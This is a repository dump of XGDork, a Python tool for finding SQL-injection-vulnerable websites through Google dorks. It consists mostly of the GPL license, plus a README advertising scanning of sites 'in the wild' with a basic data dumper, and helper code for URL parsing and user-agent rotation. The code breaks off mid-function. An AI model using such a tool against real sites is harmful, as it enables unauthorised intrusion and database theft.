├── LICENSE ├── README.md ├── XGDlib.py ├── XGDork.py ├── XGDtoolz.py ├── XGDumper.py ├── agents.txt ├── gd_data.txt ├── gd_ext.txt ├── gd_keywords.txt ├── gd_namespage.txt ├── gd_params.txt └── version.txt /LICENSE: -------------------------------------------------------------------------------- 1 | GNU GENERAL PUBLIC LICENSE 2 | Version 3, 29 June 2007 3 | 4 | Copyright (C) 2007 Free Software Foundation, Inc. 5 | Everyone is permitted to copy and distribute verbatim copies 6 | of this license document, but changing it is not allowed. 7 | 8 | Preamble 9 | 10 | The GNU General Public License is a free, copyleft license for 11 | software and other kinds of works. 12 | 13 | The licenses for most software and other practical works are designed 14 | to take away your freedom to share and change the works. By contrast, 15 | the GNU General Public License is intended to guarantee your freedom to 16 | share and change all versions of a program--to make sure it remains free 17 | software for all its users. We, the Free Software Foundation, use the 18 | GNU General Public License for most of our software; it applies also to 19 | any other work released this way by its authors. You can apply it to 20 | your programs, too. 21 | 22 | When we speak of free software, we are referring to freedom, not 23 | price. Our General Public Licenses are designed to make sure that you 24 | have the freedom to distribute copies of free software (and charge for 25 | them if you wish), that you receive source code or can get it if you 26 | want it, that you can change the software or use pieces of it in new 27 | free programs, and that you know you can do these things. 28 | 29 | To protect your rights, we need to prevent others from denying you 30 | these rights or asking you to surrender the rights. Therefore, you have 31 | certain responsibilities if you distribute copies of the software, or if 32 | you modify it: responsibilities to respect the freedom of others. 33 | 34 | For example, if you distribute copies of such a program, whether 35 | gratis or for a fee, you must pass on to the recipients the same 36 | freedoms that you received. You must make sure that they, too, receive 37 | or can get the source code. And you must show them these terms so they 38 | know their rights. 39 | 40 | Developers that use the GNU GPL protect your rights with two steps: 41 | (1) assert copyright on the software, and (2) offer you this License 42 | giving you legal permission to copy, distribute and/or modify it. 43 | 44 | For the developers' and authors' protection, the GPL clearly explains 45 | that there is no warranty for this free software. For both users' and 46 | authors' sake, the GPL requires that modified versions be marked as 47 | changed, so that their problems will not be attributed erroneously to 48 | authors of previous versions. 49 | 50 | Some devices are designed to deny users access to install or run 51 | modified versions of the software inside them, although the manufacturer 52 | can do so. This is fundamentally incompatible with the aim of 53 | protecting users' freedom to change the software. The systematic 54 | pattern of such abuse occurs in the area of products for individuals to 55 | use, which is precisely where it is most unacceptable. Therefore, we 56 | have designed this version of the GPL to prohibit the practice for those 57 | products. If such problems arise substantially in other domains, we 58 | stand ready to extend this provision to those domains in future versions 59 | of the GPL, as needed to protect the freedom of users. 60 | 61 | Finally, every program is threatened constantly by software patents. 62 | States should not allow patents to restrict development and use of 63 | software on general-purpose computers, but in those that do, we wish to 64 | avoid the special danger that patents applied to a free program could 65 | make it effectively proprietary. To prevent this, the GPL assures that 66 | patents cannot be used to render the program non-free. 67 | 68 | The precise terms and conditions for copying, distribution and 69 | modification follow. 70 | 71 | TERMS AND CONDITIONS 72 | 73 | 0. Definitions. 74 | 75 | "This License" refers to version 3 of the GNU General Public License. 76 | 77 | "Copyright" also means copyright-like laws that apply to other kinds of 78 | works, such as semiconductor masks. 79 | 80 | "The Program" refers to any copyrightable work licensed under this 81 | License. Each licensee is addressed as "you". "Licensees" and 82 | "recipients" may be individuals or organizations. 83 | 84 | To "modify" a work means to copy from or adapt all or part of the work 85 | in a fashion requiring copyright permission, other than the making of an 86 | exact copy. The resulting work is called a "modified version" of the 87 | earlier work or a work "based on" the earlier work. 88 | 89 | A "covered work" means either the unmodified Program or a work based 90 | on the Program. 91 | 92 | To "propagate" a work means to do anything with it that, without 93 | permission, would make you directly or secondarily liable for 94 | infringement under applicable copyright law, except executing it on a 95 | computer or modifying a private copy. Propagation includes copying, 96 | distribution (with or without modification), making available to the 97 | public, and in some countries other activities as well. 98 | 99 | To "convey" a work means any kind of propagation that enables other 100 | parties to make or receive copies. Mere interaction with a user through 101 | a computer network, with no transfer of a copy, is not conveying. 102 | 103 | An interactive user interface displays "Appropriate Legal Notices" 104 | to the extent that it includes a convenient and prominently visible 105 | feature that (1) displays an appropriate copyright notice, and (2) 106 | tells the user that there is no warranty for the work (except to the 107 | extent that warranties are provided), that licensees may convey the 108 | work under this License, and how to view a copy of this License. If 109 | the interface presents a list of user commands or options, such as a 110 | menu, a prominent item in the list meets this criterion. 111 | 112 | 1. Source Code. 113 | 114 | The "source code" for a work means the preferred form of the work 115 | for making modifications to it. "Object code" means any non-source 116 | form of a work. 117 | 118 | A "Standard Interface" means an interface that either is an official 119 | standard defined by a recognized standards body, or, in the case of 120 | interfaces specified for a particular programming language, one that 121 | is widely used among developers working in that language. 122 | 123 | The "System Libraries" of an executable work include anything, other 124 | than the work as a whole, that (a) is included in the normal form of 125 | packaging a Major Component, but which is not part of that Major 126 | Component, and (b) serves only to enable use of the work with that 127 | Major Component, or to implement a Standard Interface for which an 128 | implementation is available to the public in source code form. A 129 | "Major Component", in this context, means a major essential component 130 | (kernel, window system, and so on) of the specific operating system 131 | (if any) on which the executable work runs, or a compiler used to 132 | produce the work, or an object code interpreter used to run it. 133 | 134 | The "Corresponding Source" for a work in object code form means all 135 | the source code needed to generate, install, and (for an executable 136 | work) run the object code and to modify the work, including scripts to 137 | control those activities. However, it does not include the work's 138 | System Libraries, or general-purpose tools or generally available free 139 | programs which are used unmodified in performing those activities but 140 | which are not part of the work. For example, Corresponding Source 141 | includes interface definition files associated with source files for 142 | the work, and the source code for shared libraries and dynamically 143 | linked subprograms that the work is specifically designed to require, 144 | such as by intimate data communication or control flow between those 145 | subprograms and other parts of the work. 146 | 147 | The Corresponding Source need not include anything that users 148 | can regenerate automatically from other parts of the Corresponding 149 | Source. 150 | 151 | The Corresponding Source for a work in source code form is that 152 | same work. 153 | 154 | 2. Basic Permissions. 155 | 156 | All rights granted under this License are granted for the term of 157 | copyright on the Program, and are irrevocable provided the stated 158 | conditions are met. This License explicitly affirms your unlimited 159 | permission to run the unmodified Program. The output from running a 160 | covered work is covered by this License only if the output, given its 161 | content, constitutes a covered work. This License acknowledges your 162 | rights of fair use or other equivalent, as provided by copyright law. 163 | 164 | You may make, run and propagate covered works that you do not 165 | convey, without conditions so long as your license otherwise remains 166 | in force. You may convey covered works to others for the sole purpose 167 | of having them make modifications exclusively for you, or provide you 168 | with facilities for running those works, provided that you comply with 169 | the terms of this License in conveying all material for which you do 170 | not control copyright. Those thus making or running the covered works 171 | for you must do so exclusively on your behalf, under your direction 172 | and control, on terms that prohibit them from making any copies of 173 | your copyrighted material outside their relationship with you. 174 | 175 | Conveying under any other circumstances is permitted solely under 176 | the conditions stated below. Sublicensing is not allowed; section 10 177 | makes it unnecessary. 178 | 179 | 3. Protecting Users' Legal Rights From Anti-Circumvention Law. 180 | 181 | No covered work shall be deemed part of an effective technological 182 | measure under any applicable law fulfilling obligations under article 183 | 11 of the WIPO copyright treaty adopted on 20 December 1996, or 184 | similar laws prohibiting or restricting circumvention of such 185 | measures. 186 | 187 | When you convey a covered work, you waive any legal power to forbid 188 | circumvention of technological measures to the extent such circumvention 189 | is effected by exercising rights under this License with respect to 190 | the covered work, and you disclaim any intention to limit operation or 191 | modification of the work as a means of enforcing, against the work's 192 | users, your or third parties' legal rights to forbid circumvention of 193 | technological measures. 194 | 195 | 4. Conveying Verbatim Copies. 196 | 197 | You may convey verbatim copies of the Program's source code as you 198 | receive it, in any medium, provided that you conspicuously and 199 | appropriately publish on each copy an appropriate copyright notice; 200 | keep intact all notices stating that this License and any 201 | non-permissive terms added in accord with section 7 apply to the code; 202 | keep intact all notices of the absence of any warranty; and give all 203 | recipients a copy of this License along with the Program. 204 | 205 | You may charge any price or no price for each copy that you convey, 206 | and you may offer support or warranty protection for a fee. 207 | 208 | 5. Conveying Modified Source Versions. 209 | 210 | You may convey a work based on the Program, or the modifications to 211 | produce it from the Program, in the form of source code under the 212 | terms of section 4, provided that you also meet all of these conditions: 213 | 214 | a) The work must carry prominent notices stating that you modified 215 | it, and giving a relevant date. 216 | 217 | b) The work must carry prominent notices stating that it is 218 | released under this License and any conditions added under section 219 | 7. This requirement modifies the requirement in section 4 to 220 | "keep intact all notices". 221 | 222 | c) You must license the entire work, as a whole, under this 223 | License to anyone who comes into possession of a copy. This 224 | License will therefore apply, along with any applicable section 7 225 | additional terms, to the whole of the work, and all its parts, 226 | regardless of how they are packaged. This License gives no 227 | permission to license the work in any other way, but it does not 228 | invalidate such permission if you have separately received it. 229 | 230 | d) If the work has interactive user interfaces, each must display 231 | Appropriate Legal Notices; however, if the Program has interactive 232 | interfaces that do not display Appropriate Legal Notices, your 233 | work need not make them do so. 234 | 235 | A compilation of a covered work with other separate and independent 236 | works, which are not by their nature extensions of the covered work, 237 | and which are not combined with it such as to form a larger program, 238 | in or on a volume of a storage or distribution medium, is called an 239 | "aggregate" if the compilation and its resulting copyright are not 240 | used to limit the access or legal rights of the compilation's users 241 | beyond what the individual works permit. Inclusion of a covered work 242 | in an aggregate does not cause this License to apply to the other 243 | parts of the aggregate. 244 | 245 | 6. Conveying Non-Source Forms. 246 | 247 | You may convey a covered work in object code form under the terms 248 | of sections 4 and 5, provided that you also convey the 249 | machine-readable Corresponding Source under the terms of this License, 250 | in one of these ways: 251 | 252 | a) Convey the object code in, or embodied in, a physical product 253 | (including a physical distribution medium), accompanied by the 254 | Corresponding Source fixed on a durable physical medium 255 | customarily used for software interchange. 256 | 257 | b) Convey the object code in, or embodied in, a physical product 258 | (including a physical distribution medium), accompanied by a 259 | written offer, valid for at least three years and valid for as 260 | long as you offer spare parts or customer support for that product 261 | model, to give anyone who possesses the object code either (1) a 262 | copy of the Corresponding Source for all the software in the 263 | product that is covered by this License, on a durable physical 264 | medium customarily used for software interchange, for a price no 265 | more than your reasonable cost of physically performing this 266 | conveying of source, or (2) access to copy the 267 | Corresponding Source from a network server at no charge. 268 | 269 | c) Convey individual copies of the object code with a copy of the 270 | written offer to provide the Corresponding Source. This 271 | alternative is allowed only occasionally and noncommercially, and 272 | only if you received the object code with such an offer, in accord 273 | with subsection 6b. 274 | 275 | d) Convey the object code by offering access from a designated 276 | place (gratis or for a charge), and offer equivalent access to the 277 | Corresponding Source in the same way through the same place at no 278 | further charge. You need not require recipients to copy the 279 | Corresponding Source along with the object code. If the place to 280 | copy the object code is a network server, the Corresponding Source 281 | may be on a different server (operated by you or a third party) 282 | that supports equivalent copying facilities, provided you maintain 283 | clear directions next to the object code saying where to find the 284 | Corresponding Source. Regardless of what server hosts the 285 | Corresponding Source, you remain obligated to ensure that it is 286 | available for as long as needed to satisfy these requirements. 287 | 288 | e) Convey the object code using peer-to-peer transmission, provided 289 | you inform other peers where the object code and Corresponding 290 | Source of the work are being offered to the general public at no 291 | charge under subsection 6d. 292 | 293 | A separable portion of the object code, whose source code is excluded 294 | from the Corresponding Source as a System Library, need not be 295 | included in conveying the object code work. 296 | 297 | A "User Product" is either (1) a "consumer product", which means any 298 | tangible personal property which is normally used for personal, family, 299 | or household purposes, or (2) anything designed or sold for incorporation 300 | into a dwelling. In determining whether a product is a consumer product, 301 | doubtful cases shall be resolved in favor of coverage. For a particular 302 | product received by a particular user, "normally used" refers to a 303 | typical or common use of that class of product, regardless of the status 304 | of the particular user or of the way in which the particular user 305 | actually uses, or expects or is expected to use, the product. A product 306 | is a consumer product regardless of whether the product has substantial 307 | commercial, industrial or non-consumer uses, unless such uses represent 308 | the only significant mode of use of the product. 309 | 310 | "Installation Information" for a User Product means any methods, 311 | procedures, authorization keys, or other information required to install 312 | and execute modified versions of a covered work in that User Product from 313 | a modified version of its Corresponding Source. The information must 314 | suffice to ensure that the continued functioning of the modified object 315 | code is in no case prevented or interfered with solely because 316 | modification has been made. 317 | 318 | If you convey an object code work under this section in, or with, or 319 | specifically for use in, a User Product, and the conveying occurs as 320 | part of a transaction in which the right of possession and use of the 321 | User Product is transferred to the recipient in perpetuity or for a 322 | fixed term (regardless of how the transaction is characterized), the 323 | Corresponding Source conveyed under this section must be accompanied 324 | by the Installation Information. But this requirement does not apply 325 | if neither you nor any third party retains the ability to install 326 | modified object code on the User Product (for example, the work has 327 | been installed in ROM). 328 | 329 | The requirement to provide Installation Information does not include a 330 | requirement to continue to provide support service, warranty, or updates 331 | for a work that has been modified or installed by the recipient, or for 332 | the User Product in which it has been modified or installed. Access to a 333 | network may be denied when the modification itself materially and 334 | adversely affects the operation of the network or violates the rules and 335 | protocols for communication across the network. 336 | 337 | Corresponding Source conveyed, and Installation Information provided, 338 | in accord with this section must be in a format that is publicly 339 | documented (and with an implementation available to the public in 340 | source code form), and must require no special password or key for 341 | unpacking, reading or copying. 342 | 343 | 7. Additional Terms. 344 | 345 | "Additional permissions" are terms that supplement the terms of this 346 | License by making exceptions from one or more of its conditions. 347 | Additional permissions that are applicable to the entire Program shall 348 | be treated as though they were included in this License, to the extent 349 | that they are valid under applicable law. If additional permissions 350 | apply only to part of the Program, that part may be used separately 351 | under those permissions, but the entire Program remains governed by 352 | this License without regard to the additional permissions. 353 | 354 | When you convey a copy of a covered work, you may at your option 355 | remove any additional permissions from that copy, or from any part of 356 | it. (Additional permissions may be written to require their own 357 | removal in certain cases when you modify the work.) You may place 358 | additional permissions on material, added by you to a covered work, 359 | for which you have or can give appropriate copyright permission. 360 | 361 | Notwithstanding any other provision of this License, for material you 362 | add to a covered work, you may (if authorized by the copyright holders of 363 | that material) supplement the terms of this License with terms: 364 | 365 | a) Disclaiming warranty or limiting liability differently from the 366 | terms of sections 15 and 16 of this License; or 367 | 368 | b) Requiring preservation of specified reasonable legal notices or 369 | author attributions in that material or in the Appropriate Legal 370 | Notices displayed by works containing it; or 371 | 372 | c) Prohibiting misrepresentation of the origin of that material, or 373 | requiring that modified versions of such material be marked in 374 | reasonable ways as different from the original version; or 375 | 376 | d) Limiting the use for publicity purposes of names of licensors or 377 | authors of the material; or 378 | 379 | e) Declining to grant rights under trademark law for use of some 380 | trade names, trademarks, or service marks; or 381 | 382 | f) Requiring indemnification of licensors and authors of that 383 | material by anyone who conveys the material (or modified versions of 384 | it) with contractual assumptions of liability to the recipient, for 385 | any liability that these contractual assumptions directly impose on 386 | those licensors and authors. 387 | 388 | All other non-permissive additional terms are considered "further 389 | restrictions" within the meaning of section 10. If the Program as you 390 | received it, or any part of it, contains a notice stating that it is 391 | governed by this License along with a term that is a further 392 | restriction, you may remove that term. If a license document contains 393 | a further restriction but permits relicensing or conveying under this 394 | License, you may add to a covered work material governed by the terms 395 | of that license document, provided that the further restriction does 396 | not survive such relicensing or conveying. 397 | 398 | If you add terms to a covered work in accord with this section, you 399 | must place, in the relevant source files, a statement of the 400 | additional terms that apply to those files, or a notice indicating 401 | where to find the applicable terms. 402 | 403 | Additional terms, permissive or non-permissive, may be stated in the 404 | form of a separately written license, or stated as exceptions; 405 | the above requirements apply either way. 406 | 407 | 8. Termination. 408 | 409 | You may not propagate or modify a covered work except as expressly 410 | provided under this License. Any attempt otherwise to propagate or 411 | modify it is void, and will automatically terminate your rights under 412 | this License (including any patent licenses granted under the third 413 | paragraph of section 11). 414 | 415 | However, if you cease all violation of this License, then your 416 | license from a particular copyright holder is reinstated (a) 417 | provisionally, unless and until the copyright holder explicitly and 418 | finally terminates your license, and (b) permanently, if the copyright 419 | holder fails to notify you of the violation by some reasonable means 420 | prior to 60 days after the cessation. 421 | 422 | Moreover, your license from a particular copyright holder is 423 | reinstated permanently if the copyright holder notifies you of the 424 | violation by some reasonable means, this is the first time you have 425 | received notice of violation of this License (for any work) from that 426 | copyright holder, and you cure the violation prior to 30 days after 427 | your receipt of the notice. 428 | 429 | Termination of your rights under this section does not terminate the 430 | licenses of parties who have received copies or rights from you under 431 | this License. If your rights have been terminated and not permanently 432 | reinstated, you do not qualify to receive new licenses for the same 433 | material under section 10. 434 | 435 | 9. Acceptance Not Required for Having Copies. 436 | 437 | You are not required to accept this License in order to receive or 438 | run a copy of the Program. Ancillary propagation of a covered work 439 | occurring solely as a consequence of using peer-to-peer transmission 440 | to receive a copy likewise does not require acceptance. However, 441 | nothing other than this License grants you permission to propagate or 442 | modify any covered work. These actions infringe copyright if you do 443 | not accept this License. Therefore, by modifying or propagating a 444 | covered work, you indicate your acceptance of this License to do so. 445 | 446 | 10. Automatic Licensing of Downstream Recipients. 447 | 448 | Each time you convey a covered work, the recipient automatically 449 | receives a license from the original licensors, to run, modify and 450 | propagate that work, subject to this License. You are not responsible 451 | for enforcing compliance by third parties with this License. 452 | 453 | An "entity transaction" is a transaction transferring control of an 454 | organization, or substantially all assets of one, or subdividing an 455 | organization, or merging organizations. If propagation of a covered 456 | work results from an entity transaction, each party to that 457 | transaction who receives a copy of the work also receives whatever 458 | licenses to the work the party's predecessor in interest had or could 459 | give under the previous paragraph, plus a right to possession of the 460 | Corresponding Source of the work from the predecessor in interest, if 461 | the predecessor has it or can get it with reasonable efforts. 462 | 463 | You may not impose any further restrictions on the exercise of the 464 | rights granted or affirmed under this License. For example, you may 465 | not impose a license fee, royalty, or other charge for exercise of 466 | rights granted under this License, and you may not initiate litigation 467 | (including a cross-claim or counterclaim in a lawsuit) alleging that 468 | any patent claim is infringed by making, using, selling, offering for 469 | sale, or importing the Program or any portion of it. 470 | 471 | 11. Patents. 472 | 473 | A "contributor" is a copyright holder who authorizes use under this 474 | License of the Program or a work on which the Program is based. The 475 | work thus licensed is called the contributor's "contributor version". 476 | 477 | A contributor's "essential patent claims" are all patent claims 478 | owned or controlled by the contributor, whether already acquired or 479 | hereafter acquired, that would be infringed by some manner, permitted 480 | by this License, of making, using, or selling its contributor version, 481 | but do not include claims that would be infringed only as a 482 | consequence of further modification of the contributor version. For 483 | purposes of this definition, "control" includes the right to grant 484 | patent sublicenses in a manner consistent with the requirements of 485 | this License. 486 | 487 | Each contributor grants you a non-exclusive, worldwide, royalty-free 488 | patent license under the contributor's essential patent claims, to 489 | make, use, sell, offer for sale, import and otherwise run, modify and 490 | propagate the contents of its contributor version. 491 | 492 | In the following three paragraphs, a "patent license" is any express 493 | agreement or commitment, however denominated, not to enforce a patent 494 | (such as an express permission to practice a patent or covenant not to 495 | sue for patent infringement). To "grant" such a patent license to a 496 | party means to make such an agreement or commitment not to enforce a 497 | patent against the party. 498 | 499 | If you convey a covered work, knowingly relying on a patent license, 500 | and the Corresponding Source of the work is not available for anyone 501 | to copy, free of charge and under the terms of this License, through a 502 | publicly available network server or other readily accessible means, 503 | then you must either (1) cause the Corresponding Source to be so 504 | available, or (2) arrange to deprive yourself of the benefit of the 505 | patent license for this particular work, or (3) arrange, in a manner 506 | consistent with the requirements of this License, to extend the patent 507 | license to downstream recipients. "Knowingly relying" means you have 508 | actual knowledge that, but for the patent license, your conveying the 509 | covered work in a country, or your recipient's use of the covered work 510 | in a country, would infringe one or more identifiable patents in that 511 | country that you have reason to believe are valid. 512 | 513 | If, pursuant to or in connection with a single transaction or 514 | arrangement, you convey, or propagate by procuring conveyance of, a 515 | covered work, and grant a patent license to some of the parties 516 | receiving the covered work authorizing them to use, propagate, modify 517 | or convey a specific copy of the covered work, then the patent license 518 | you grant is automatically extended to all recipients of the covered 519 | work and works based on it. 520 | 521 | A patent license is "discriminatory" if it does not include within 522 | the scope of its coverage, prohibits the exercise of, or is 523 | conditioned on the non-exercise of one or more of the rights that are 524 | specifically granted under this License. You may not convey a covered 525 | work if you are a party to an arrangement with a third party that is 526 | in the business of distributing software, under which you make payment 527 | to the third party based on the extent of your activity of conveying 528 | the work, and under which the third party grants, to any of the 529 | parties who would receive the covered work from you, a discriminatory 530 | patent license (a) in connection with copies of the covered work 531 | conveyed by you (or copies made from those copies), or (b) primarily 532 | for and in connection with specific products or compilations that 533 | contain the covered work, unless you entered into that arrangement, 534 | or that patent license was granted, prior to 28 March 2007. 535 | 536 | Nothing in this License shall be construed as excluding or limiting 537 | any implied license or other defenses to infringement that may 538 | otherwise be available to you under applicable patent law. 539 | 540 | 12. No Surrender of Others' Freedom. 541 | 542 | If conditions are imposed on you (whether by court order, agreement or 543 | otherwise) that contradict the conditions of this License, they do not 544 | excuse you from the conditions of this License. If you cannot convey a 545 | covered work so as to satisfy simultaneously your obligations under this 546 | License and any other pertinent obligations, then as a consequence you may 547 | not convey it at all. For example, if you agree to terms that obligate you 548 | to collect a royalty for further conveying from those to whom you convey 549 | the Program, the only way you could satisfy both those terms and this 550 | License would be to refrain entirely from conveying the Program. 551 | 552 | 13. Use with the GNU Affero General Public License. 553 | 554 | Notwithstanding any other provision of this License, you have 555 | permission to link or combine any covered work with a work licensed 556 | under version 3 of the GNU Affero General Public License into a single 557 | combined work, and to convey the resulting work. The terms of this 558 | License will continue to apply to the part which is the covered work, 559 | but the special requirements of the GNU Affero General Public License, 560 | section 13, concerning interaction through a network will apply to the 561 | combination as such. 562 | 563 | 14. Revised Versions of this License. 564 | 565 | The Free Software Foundation may publish revised and/or new versions of 566 | the GNU General Public License from time to time. Such new versions will 567 | be similar in spirit to the present version, but may differ in detail to 568 | address new problems or concerns. 569 | 570 | Each version is given a distinguishing version number. If the 571 | Program specifies that a certain numbered version of the GNU General 572 | Public License "or any later version" applies to it, you have the 573 | option of following the terms and conditions either of that numbered 574 | version or of any later version published by the Free Software 575 | Foundation. If the Program does not specify a version number of the 576 | GNU General Public License, you may choose any version ever published 577 | by the Free Software Foundation. 578 | 579 | If the Program specifies that a proxy can decide which future 580 | versions of the GNU General Public License can be used, that proxy's 581 | public statement of acceptance of a version permanently authorizes you 582 | to choose that version for the Program. 583 | 584 | Later license versions may give you additional or different 585 | permissions. However, no additional obligations are imposed on any 586 | author or copyright holder as a result of your choosing to follow a 587 | later version. 588 | 589 | 15. Disclaimer of Warranty. 590 | 591 | THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY 592 | APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT 593 | HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY 594 | OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, 595 | THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 596 | PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM 597 | IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF 598 | ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 599 | 600 | 16. Limitation of Liability. 601 | 602 | IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING 603 | WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS 604 | THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY 605 | GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE 606 | USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF 607 | DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD 608 | PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), 609 | EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF 610 | SUCH DAMAGES. 611 | 612 | 17. Interpretation of Sections 15 and 16. 613 | 614 | If the disclaimer of warranty and limitation of liability provided 615 | above cannot be given local legal effect according to their terms, 616 | reviewing courts shall apply local law that most closely approximates 617 | an absolute waiver of all civil liability in connection with the 618 | Program, unless a warranty or assumption of liability accompanies a 619 | copy of the Program in return for a fee. 620 | 621 | END OF TERMS AND CONDITIONS 622 | 623 | How to Apply These Terms to Your New Programs 624 | 625 | If you develop a new program, and you want it to be of the greatest 626 | possible use to the public, the best way to achieve this is to make it 627 | free software which everyone can redistribute and change under these terms. 628 | 629 | To do so, attach the following notices to the program. It is safest 630 | to attach them to the start of each source file to most effectively 631 | state the exclusion of warranty; and each file should have at least 632 | the "copyright" line and a pointer to where the full notice is found. 633 | 634 | 635 | Copyright (C) 636 | 637 | This program is free software: you can redistribute it and/or modify 638 | it under the terms of the GNU General Public License as published by 639 | the Free Software Foundation, either version 3 of the License, or 640 | (at your option) any later version. 641 | 642 | This program is distributed in the hope that it will be useful, 643 | but WITHOUT ANY WARRANTY; without even the implied warranty of 644 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 645 | GNU General Public License for more details. 646 | 647 | You should have received a copy of the GNU General Public License 648 | along with this program. If not, see . 649 | 650 | Also add information on how to contact you by electronic and paper mail. 651 | 652 | If the program does terminal interaction, make it output a short 653 | notice like this when it starts in an interactive mode: 654 | 655 | Copyright (C) 656 | This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'. 657 | This is free software, and you are welcome to redistribute it 658 | under certain conditions; type `show c' for details. 659 | 660 | The hypothetical commands `show w' and `show c' should show the appropriate 661 | parts of the General Public License. Of course, your program's commands 662 | might be different; for a GUI interface, you would use an "about box". 663 | 664 | You should also get your employer (if you work as a programmer) or school, 665 | if any, to sign a "copyright disclaimer" for the program, if necessary. 666 | For more information on this, and how to apply and follow the GNU GPL, see 667 | . 668 | 669 | The GNU General Public License does not permit incorporating your program 670 | into proprietary programs. If your program is a subroutine library, you 671 | may consider it more useful to permit linking proprietary applications with 672 | the library. If this is what you want to do, use the GNU Lesser General 673 | Public License instead of this License. But first, please read 674 | . 675 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # XGDork - ViraX Google Dork Scanner 2 | 3 | #**WARNING, ! NEW VERSION ! use XGDork²** here -> https://github.com/E4rr0r4/XGDork-2 4 | 5 | SQLi Google Dork Scanner by ViraX @ 2018 - 2019 6 | - for Python 2.7 - compatible Android(NoRoot) - Termux 7 | 8 | A simple 'naive' python tool to find SQLi Vulnerable websites in the wild via Google. 9 | 10 | [!] DISCLAIMER: I am not responsible for illegal acts that you would do with this program !, only educational . [!] 11 | - SQL Dork Scanner 12 | - SQL Dumper module (basic) 13 | - Simple Tools 14 | 15 | --- Setup --- 16 | - install Python 2.7 / on Termux 'pkg install python2' 17 | - pip/pip2 install requests 18 | - pip/pip2 install termcolor 19 | - install git / on Termux 'pkg install git' 20 | - git clone https://github.com/E4rr0r4/XGDork.git 21 | - cd XGDork 22 | - chmod XGDork.py (optional) 23 | - python/python2 XGDork.py --help 24 | 25 | 26 | version: Final-1.0k2-FreeSoftware 27 | 28 | - Contributor(s)/Source(s) 29 | * SQLmap 'agents file' - https://github.com/sqlmapproject/ 30 | -------------------------------------------------------------------------------- /XGDlib.py: -------------------------------------------------------------------------------- 1 | 2 | 3 | # This program is a 'total' free software: you can redistribute it and/or modify - ViraX 4 | # You can quoted me as a source. 5 | 6 | import os 7 | import sys 8 | import requests 9 | import time 10 | import socket 11 | from random import randint 12 | from termcolor import colored 13 | 14 | 15 | 16 | def block_cutter (string, int_start, int_end): 17 | 18 | newd = "" 19 | 20 | while (int_start <= int_end): 21 | newd += string[int_start] 22 | int_start += 1 23 | return newd 24 | 25 | 26 | def focpa (url, param): 27 | burl = "" 28 | i = 0 29 | ca = 0 30 | cb = 0 31 | tmp = "" 32 | 33 | while (i < len(url)): 34 | if (url[i] == '?' or url[i] == '&'): 35 | i += 1 36 | ca = i 37 | while (i < len(url) and url[i] != param[len(param)-1]): 38 | i += 1 39 | cb = i 40 | tmp = block_cutter(url, ca, cb) 41 | if (tmp == param): 42 | burl = block_cutter(url, 0, cb) 43 | return burl 44 | else: 45 | burl = ca+1 46 | i += 1 47 | 48 | return -1 49 | 50 | 51 | def parserDump (data, mod): 52 | i = 0 53 | ca = 0 54 | cb = 0 55 | data_list = [] 56 | 57 | while (i < len(data)-1): 58 | if (data[i] == '(' and data[i+1] == '^' and data[i+2] == '#'): 59 | i += 5 60 | ca = i 61 | while (i < len(data)-2 and (data[i] != '(' and data[i+2] != '#')): 62 | if (i == data.find("' for key")): 63 | break 64 | if (data[i] == '<'): 65 | break 66 | i += 1 67 | i -= 1 68 | cb = i 69 | tmp = block_cutter(data, ca, cb) 70 | data_list.append(tmp) 71 | 72 | #print colored(" "+tmp, 'yellow') 73 | if (mod == 1): 74 | return data_list 75 | i += 1 76 | 77 | return data_list 78 | 79 | 80 | 81 | def dump_page(string): 82 | dump = [] 83 | string = string.replace("range(", '') 84 | string = string.replace(')', '') 85 | dump = string.split(',') 86 | 87 | return dump 88 | 89 | 90 | 91 | def rand_agent (): 92 | 93 | agent_file = open('agents.txt', 'r') 94 | size = int(len(agent_file.readlines())-1) 95 | rnd_n = randint(5, size) 96 | agent_file.close() 97 | agent_file = open('agents.txt', 'r') 98 | user_agent = str(agent_file.readlines()[rnd_n]) 99 | agent_file.close() 100 | user_agent = user_agent.replace('\n', '') 101 | return user_agent 102 | 103 | 104 | 105 | def ipuser (): 106 | 107 | ca = 0 108 | cb = 0 109 | ipreq = requests 110 | 111 | try: 112 | ipreq = requests.get('https://www.iplocation.net/find-ip-address') 113 | data = ipreq.text.encode('utf-8') 114 | 115 | if (data.find("color:green;'>") > -1): 116 | ca = data.find("color:green;'>")+len("color:green;'>") 117 | if (data.find(".
-1): 118 | cb = data.find(".
About this page

